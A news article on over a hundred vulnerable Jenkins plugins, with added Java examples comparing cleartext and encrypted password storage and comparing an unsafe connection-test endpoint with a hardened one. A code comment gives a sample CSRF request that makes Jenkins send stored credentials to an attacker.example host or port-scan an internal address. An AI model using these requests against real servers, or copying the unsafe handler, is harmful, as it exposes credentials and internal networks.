A security researcher has found and reported security flaws in more than one hundred different Jenkins plugins over the past 18 months, and despite efforts to notify their developers, many of those plugins have still not received a fix.
The Jenkins team has published ten security advisories covering these vulnerabilities in the last 18 months, warning developers to uninstall the vulnerable plugins [1, 2, 3, 4, 5, 6, 7, 8, 9, 10].
WHAT IS JENKINS?
NCC Group Security Consultant Viktor Gazdag is credited with discovering all of the vulnerabilities, each of which affects a plugin for Jenkins, a popular web-based application used by development teams.
Jenkins, which is written in Java, works as a continuous integration/continuous deployment (CI/CD) system that lets development teams run automated tests and perform various operations based on the test results, such as deploying new applications and code to production servers.
Because of its testing and automation features, Jenkins is wildly popular, in the enterprise sector in particular, with nearly 79,000 internet-exposed instances according to Shodan, a search engine for discovering internet-connected systems.
VULNERABILITIES IMPACT PLUGINS, NOT JENKINS
As with any modern web application, Jenkins' core feature set can be extended through plugins, and as with most open-source projects, the vast majority of Jenkins plugins were created by third-party developers.
Unfortunately, as happens with most open-source projects today, developers cannot maintain their code indefinitely, and a number of these plugins have been abandoned, with nobody left to provide support.
Gazdag is now warning owners of Jenkins installations that some of these abandoned plugins may end up putting company systems at risk because of unpatched security flaws, some of which are extremely dangerous.
THE MOST COMMON VULNERABILITIES
The NCC Group researcher said that one of the most common security flaws he found was that many Jenkins plugins stored passwords in cleartext inside their own configuration files, instead of using Jenkins' built-in credentials store (credentials.xml), which stores the secrets it holds in encrypted form.
For example, if a plugin designed to connect Jenkins to a third-party technology, such as a database, a message broker (MQ) server, or a cloud provider, did not encrypt the password inside its configuration file, an attacker who managed to retrieve that file would gain easy access to those systems as well.
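The storage difference described above, as an added illustration that is not code from any of the affected plugins or from Jenkins itself. Jenkins persists plugin configuration objects with XStream, so the declared Java type of a field decides what lands on disk in `$JENKINS_HOME`. `BrokerSettings`, `BrokerSettingsBefore`, their fields and the on-disk file names are hypothetical; `hudson.util.Secret`, `GlobalConfiguration` and `@DataBoundSetter` are real Jenkins core APIs.

```java
import hudson.Extension;
import hudson.util.Secret;
import jenkins.model.GlobalConfiguration;
import org.kohsuke.stapler.DataBoundSetter;

// BEFORE: the pattern behind many of the reported flaws (hypothetical plugin code).
// A plain String field is serialised verbatim, so the saved file
// $JENKINS_HOME/com.example.BrokerSettingsBefore.xml contains
//   <password>hunter2</password>
// @Extension is deliberately omitted here so this file registers only one
// extension point; the class is otherwise identical to the fixed one below.
class BrokerSettingsBefore extends GlobalConfiguration {
    private String brokerUrl;
    private String username;
    private String password;

    public String getPassword() { return password; }

    @DataBoundSetter
    public void setPassword(String password) {
        this.password = password;
        save(); // writes the cleartext value to disk
    }
}

// AFTER: the same settings object, but the password is a hudson.util.Secret.
// Jenkins registers an XStream converter for Secret, so the saved file now holds
// the value encrypted with the instance's master key, for example
//   <password>{AQAAABAAAAAw...}</password>
@Extension
public class BrokerSettings extends GlobalConfiguration {
    private String brokerUrl;
    private String username;
    private Secret password;

    public BrokerSettings() {
        load(); // reads the stored XML; the Secret is decrypted transparently
    }

    public String getBrokerUrl() { return brokerUrl; }
    public String getUsername() { return username; }

    // Returning the Secret (not a String) lets the <f:password> form field
    // round-trip the encrypted form instead of echoing cleartext into the HTML.
    public Secret getPassword() { return password; }

    @DataBoundSetter
    public void setBrokerUrl(String brokerUrl) { this.brokerUrl = brokerUrl; save(); }

    @DataBoundSetter
    public void setUsername(String username) { this.username = username; save(); }

    // Stapler converts the submitted form value to a Secret via Secret.fromString().
    @DataBoundSetter
    public void setPassword(Secret password) { this.password = password; save(); }

    // Decrypt only at the point of use, and never log or persist the result.
    public String passwordForConnection() {
        return Secret.toString(password); // "" when no password is set
    }
}
```

One caveat a practitioner should keep in mind: `Secret` values are encrypted with keys kept under `$JENKINS_HOME/secrets/`, so anyone who can read the whole Jenkins home directory, or run code in the script console, can still recover them. The `Secret` type protects against the exposure the article describes, a plugin's config file leaking on its own (backups, config views, archived or version-controlled configuration), not against a full compromise of the controller.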
Furthermore, Gazdag also found CSRF (Cross-Site Request Forgery) flaws that allowed threat actors to abuse plugins' "connection test" features to make Jenkins send stored credentials to an attacker-controlled server, and SSRF (Server-Side Request Forgery) flaws that allowed threat actors to port-scan and map companies' internal networks, or to brute-force login credentials.
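The two form-validation flaw classes in the previous paragraph, shown as a vulnerable connection-test handler next to its hardened replacement. This is an added example written for this page, not code from any of the reported plugins: `ExampleServiceConfig`, the `/descriptorByName/...` path in the comment and the `prod-db` credentials id are hypothetical, while `@RequirePOST`, `FormValidation`, `Jenkins.checkPermission` and the `CredentialsProvider` lookup (from the Credentials plugin) are real APIs. Both handlers sit in one class only so they can be compared side by side.

```java
import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import hudson.Extension;
import hudson.security.ACL;
import hudson.util.FormValidation;
import jenkins.model.GlobalConfiguration;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.Collections;

@Extension
public class ExampleServiceConfig extends GlobalConfiguration {

    // BEFORE (hypothetical): the pattern behind the CSRF and SSRF findings.
    // Reachable by GET, no permission check, caller-chosen URL and caller-chosen
    // stored credential. A request such as
    //   GET /descriptorByName/com.example.ExampleServiceConfig/testConnectionUnsafe
    //         ?url=https://attacker.example/&credentialsId=prod-db
    // embedded in an <img> tag on any page an administrator visits makes Jenkins
    // send the stored "prod-db" username and password to the attacker's host,
    // and url=http://10.0.0.5:22/ turns the same handler into a port scanner.
    public FormValidation doTestConnectionUnsafe(@QueryParameter String url,
                                                 @QueryParameter String credentialsId) {
        return connect(url, credentialsId);
    }

    // AFTER: POST only (so Jenkins' CSRF crumb is enforced), administrator
    // permission required, and the destination restricted before any connection.
    @RequirePOST
    public FormValidation doTestConnection(@QueryParameter String url,
                                           @QueryParameter String credentialsId) {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        FormValidation urlCheck = checkUrl(url);
        if (urlCheck.kind != FormValidation.Kind.OK) {
            return urlCheck;
        }
        return connect(url, credentialsId);
    }

    // Coarse SSRF guard: https only, and no loopback, link-local or RFC 1918 targets.
    static FormValidation checkUrl(String url) {
        try {
            URL u = new URL(url);
            if (!"https".equals(u.getProtocol())) {
                return FormValidation.error("Only https:// URLs are allowed");
            }
            InetAddress addr = InetAddress.getByName(u.getHost());
            if (addr.isLoopbackAddress() || addr.isSiteLocalAddress()
                    || addr.isLinkLocalAddress() || addr.isAnyLocalAddress()) {
                return FormValidation.error("Refusing to connect to an internal address");
            }
            return FormValidation.ok();
        } catch (Exception e) {
            return FormValidation.error("Invalid URL: " + e.getMessage());
        }
    }

    private FormValidation connect(String url, String credentialsId) {
        StandardUsernamePasswordCredentials c = CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(StandardUsernamePasswordCredentials.class,
                        Jenkins.get(), ACL.SYSTEM, Collections.emptyList()),
                CredentialsMatchers.withId(credentialsId));
        if (c == null) {
            return FormValidation.error("Unknown credentials id");
        }
        try {
            HttpURLConnection conn = (HttpURLConnection) new URL(url).openConnection();
            String basic = c.getUsername() + ":" + c.getPassword().getPlainText();
            conn.setRequestProperty("Authorization", "Basic "
                    + Base64.getEncoder().encodeToString(basic.getBytes(StandardCharsets.UTF_8)));
            conn.setConnectTimeout(5000);
            conn.setReadTimeout(5000);
            int status = conn.getResponseCode();
            return status < 400 ? FormValidation.ok("Connected (HTTP " + status + ")")
                                : FormValidation.error("HTTP " + status);
        } catch (Exception e) {
            return FormValidation.error("Connection failed: " + e.getMessage());
        }
    }
}
```

Two points on the hardened version. The permission check is what stops a low-privileged Jenkins user from using the endpoint directly, and `@RequirePOST` is what stops a cross-site request from doing so on an administrator's behalf; either one alone leaves one of the two attack paths open. The address check in `checkUrl` resolves the host once and the connection resolves it again, so a DNS-rebinding attacker can still slip past it; a stricter fix resolves once, pins the resulting address, and connects to that, or only allows a host configured by an administrator in the first place.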
In the past, Jenkins servers have been targeted by cryptocurrency-mining botnets, but most of the vulnerabilities Gazdag found are not suited to automated attacks.
Instead, these flaws are ideal for reconnaissance operations and targeted attacks, which many of the companies that run Jenkins treat as a far bigger concern than a low-impact crypto-mining malware infection.
Last year, security researchers from CyberArk also found two vulnerabilities that let anonymous users become Jenkins administrators.